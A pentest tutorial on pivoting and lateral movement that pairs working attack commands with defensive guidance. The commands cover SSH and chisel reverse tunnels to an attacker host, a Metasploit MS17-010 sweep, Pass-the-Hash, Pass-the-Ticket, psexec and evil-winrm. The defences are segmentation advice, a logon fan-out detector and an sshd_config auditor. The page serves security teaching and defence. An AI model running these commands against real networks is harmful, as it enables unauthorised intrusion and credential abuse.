Advanced Pentest & Offensive

Pivoting and lateral movement — reaching internal networks via compromised host

Pivoting simulates what happens after an attacker gains initial access: the compromised machine is used as a stepping stone to reach other network segments that are normally inaccessible from the outside.

Pivoting concept

Typical scenario:
  Internet → [Firewall] → DMZ (192.168.1.0/24)
                            └── WebServer (192.168.1.50) ← COMPROMISED
                                    └── Internal Network (10.0.0.0/24)
                                          ├── DC (10.0.0.10)
                                          ├── DB (10.0.0.20)
                                          └── HR (10.0.0.30)

Pivoting goal:
  Attacker is at 192.168.1.50 and wants to reach 10.0.0.0/24
  without direct communication to the internal network.

Internal network discovery

# On the compromised host — discover interfaces and routes
ip addr show
ip route
cat /etc/hosts
arp -a                    # hosts that recently communicated

# Discovery sweep when nmap is not available on the compromised host
for i in $(seq 1 254); do ping -c 1 -W 1 10.0.0.$i 2>/dev/null | grep "64 bytes" & done; wait

# With nmap running on the attack machine through the pivot
# (ICMP/ARP host discovery such as -sn cannot traverse a SOCKS proxy,
#  so skip it with -Pn and use a TCP connect scan)
proxychains nmap -sT -Pn 10.0.0.0/24

SSH Tunneling — fundamental technique

Local port forwarding

# Access internal service via SSH
# Redirect local port 3306 → internal DB (10.0.0.20:3306) via pivot
ssh -L 3306:10.0.0.20:3306 user@192.168.1.50

# Now, on the attack machine:
mysql -h 127.0.0.1 -P 3306 -u root -p

Dynamic port forwarding — SOCKS proxy

# Create SOCKS5 proxy on port 1080
ssh -D 1080 user@192.168.1.50

# Configure proxychains to use the proxy
# /etc/proxychains.conf:
#   socks5  127.0.0.1  1080

# Route any tool through the pivot
proxychains nmap -sT -Pn 10.0.0.0/24
proxychains curl http://10.0.0.10
proxychains crackmapexec smb 10.0.0.0/24

Metasploit — pivot with route

# In Meterpreter, after compromising 192.168.1.50
run post/multi/manage/autoroute      # add routes automatically

# Or manually:
background
route add 10.0.0.0/24 [session_id]
route print

# Metasploit modules can now reach 10.0.0.0/24
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
run

# SOCKS proxy via Metasploit
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run

Chisel — tunneling without SSH

Useful when SSH is unavailable or filtered.

# On attacker host (server):
./chisel server -p 8080 --reverse

# On compromised host (client):
./chisel client 192.168.1.100:8080 R:1080:socks

# Result: SOCKS5 proxy at 127.0.0.1:1080 on the attack machine
# Route via proxychains as before

Lateral movement techniques

Pass-the-Hash (PTH):
  Uses captured NTLM hash to authenticate without knowing the plaintext password
  
  crackmapexec smb 10.0.0.0/24 -u administrator \
    -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Pass-the-Ticket (PTT):
  Uses a stolen Kerberos ticket to authenticate to AD services
  
  impacket-getTGT example.local/user:password
  export KRB5CCNAME=user.ccache
  impacket-psexec -k -no-pass example.local/user@dc.example.local

PsExec / WMI / WinRM:
  Remote execution with valid credentials
  
  impacket-psexec administrator:password@10.0.0.10
  evil-winrm -i 10.0.0.10 -u administrator -p password

Double pivot — chaining pivots

Attacker → Pivot1 (DMZ) → Pivot2 (Corporate Network) → Restricted Network

# Via chained SSH
ssh -L 2222:10.0.0.50:22 user@192.168.1.50
ssh -D 1080 -p 2222 user2@127.0.0.1

# Via chained proxychains
# /etc/proxychains.conf:
#   socks5 127.0.0.1 1080   # first pivot
#   socks5 127.0.0.1 1081   # second pivot

Defense against pivoting and lateral movement

Network segmentation:
  → Separate VLANs by function (DMZ, Corporate, Industrial, DB)
  → Firewall between segments — default deny; allow only the flows a service needs
    (e.g. WebServer → DB:3306, nothing from the DMZ towards the DC)
  → Zero Trust: authenticate and authorise every connection, internal networks included

Detection:
  → Alert on SSH connections initiated by servers towards other segments
    (a DMZ web server has no reason to open SSH sessions into 10.0.0.0/24)
  → Monitor port forwarding: unexpected listening sockets (netstat/ss) and
    ssh executions with -L/-D options (auditd execve rules)
  → Detect tunneling tools such as chisel/ngrok/frp (process names, file hashes, outbound connections to unusual ports)
  → Correlate authentications from the same account on multiple hosts within a short window (PTH/PTT);
    a burst of NTLM network logons from a single source is the pattern Pass-the-Hash leaves
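The last detection item is simple to implement once logons are collected centrally. The script below is an added example for this page, not a detection from any product: it takes successful network logons (constructed sample lines modelled on Windows event 4624 with logon type 3, flattened to CSV), keeps a sliding time window per account, and raises one alert when an account reaches a configurable number of distinct target hosts inside that window. Window size and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs): successful network logons, e.g. Windows event
# 4624 with logon type 3, flattened to "timestamp,target_host,account,auth_package,source_ip".
# "administrator" reaches DC, DB and HR from the DMZ web server within three seconds,
# while svc_backup touches two hosts ninety minutes apart (normal scheduled activity).
SAMPLE_LOGONS = """\
2024-05-01T09:00:05,DC,svc_backup,Kerberos,10.0.0.20
2024-05-01T09:14:10,DC,administrator,NTLM,192.168.1.50
2024-05-01T09:14:12,DB,administrator,NTLM,192.168.1.50
2024-05-01T09:14:13,HR,administrator,NTLM,192.168.1.50
2024-05-01T10:30:00,DB,svc_backup,Kerberos,10.0.0.20
2024-05-01T13:00:00,HR,jdoe,Kerberos,10.0.0.77
"""


def parse_logons(text):
    """Parse the CSV lines into dicts and return them sorted by timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, account, package, src = line.split(",")
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "account": account, "package": package, "src": src})
    return sorted(events, key=lambda e: e["ts"])


def detect_fan_out(events, window=timedelta(minutes=10), min_hosts=3):
    """Alert when one account authenticates to >= min_hosts distinct hosts within `window`.

    Uses a two-pointer sliding window per account; events must be time-ordered,
    which parse_logons guarantees.
    """
    by_account = defaultdict(list)
    for e in events:
        by_account[e["account"]].append(e)
    alerts = []
    for account, evs in by_account.items():
        start = 0
        for end, e in enumerate(evs):
            while e["ts"] - evs[start]["ts"] > window:   # drop events older than the window
                start += 1
            span = evs[start:end + 1]
            hosts = {x["host"] for x in span}
            if len(hosts) >= min_hosts:
                alerts.append({
                    "account": account,
                    "hosts": sorted(hosts),
                    "packages": sorted({x["package"] for x in span}),
                    "sources": sorted({x["src"] for x in span}),
                    "first": span[0]["ts"].isoformat(),
                    "last": span[-1]["ts"].isoformat(),
                })
                break                                    # one alert per account is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_fan_out(parse_logons(SAMPLE_LOGONS)):
        print(f"ALERT {alert['account']}: {len(alert['hosts'])} hosts "
              f"{alert['hosts']} via {alert['packages']} from {alert['sources']} "
              f"between {alert['first']} and {alert['last']}")
```

The alert carries the authentication package and source addresses on purpose: NTLM from a DMZ address into the internal segment is the Pass-the-Hash shape, whereas Pass-the-Ticket shows up as Kerberos, and a single fan-out rule catches both.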

Hardening:
  → Disable password auth on SSH (key-only)
  → Credential Guard (Windows) — isolates LSA secrets with virtualization-based security,
    so NTLM hashes and Kerberos tickets cannot be dumped from LSASS memory
  → Protected Users group in AD — members cannot authenticate with NTLM, and Kerberos
    refuses weak encryption types and delegation for them
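The SSH hardening item can be checked rather than assumed. The auditor below is an added example for this page (not an OpenSSH tool): it reads the global section of an sshd_config, applies OpenSSH's rules that the first occurrence of a keyword wins and that everything after the first Match line is conditional, fills in the OpenSSH default for any directive that is absent, and reports the settings that make a host usable as an SSH pivot. Besides key-only authentication it also covers AllowTcpForwarding, which is the directive that disables both -L and -D forwarding through that host; the two sample configs are constructed.

```python
import re

# Directive -> (wanted value, OpenSSH default applied when the directive is absent).
# AllowTcpForwarding "no" refuses both local (-L) and dynamic (-D) forwards; the
# values "local"/"remote" are also reported, since only "no" closes the pivot path.
WANTED = {
    "passwordauthentication": ("no", "yes"),
    "allowtcpforwarding": ("no", "yes"),
    "gatewayports": ("no", "no"),
    "permittunnel": ("no", "no"),
    "permitrootlogin": ("no", "prohibit-password"),
}

# Constructed sample: a DMZ web server left close to OpenSSH defaults.
# The Match block does not help, because it only applies to the user "deploy".
WEAK_CONFIG = """\
# sshd_config for the DMZ web server
Port 22
PasswordAuthentication yes
PermitRootLogin yes
PubkeyAuthentication yes
Match User deploy
    PasswordAuthentication no
"""

# Constructed sample: the same host after hardening.
HARDENED_CONFIG = """\
PasswordAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
"""

# "Keyword value" or "Keyword=value"; keywords are case-insensitive in sshd.
LINE_RE = re.compile(r"^(\S+?)[\s=]+(.*)$")


def parse_global_section(text):
    """Return {keyword_lower: value} for the part of sshd_config before any Match line."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break                           # conditional block: global section ends here
        settings.setdefault(key, value)     # sshd keeps the first occurrence
    return settings


def audit(text):
    """Return [(directive, effective_value, wanted_value), ...] for every weak setting."""
    settings = parse_global_section(text)
    findings = []
    for key, (wanted, default) in WANTED.items():
        effective = settings.get(key, default)
        if effective.lower() != wanted:
            findings.append((key, effective, wanted))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit(cfg)
        print(f"{name}: {'OK' if not findings else ''}")
        for directive, effective, wanted in findings:
            print(f"  {directive}: is '{effective}', want '{wanted}'")
```

Where a jump host genuinely needs forwarding, keep the global AllowTcpForwarding no and re-enable it inside a Match block for the specific users or groups that require it; the auditor then still reports the global default correctly.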

Pivoting reveals the true impact of a compromise. A vulnerable web server can be the entry point to the HR database.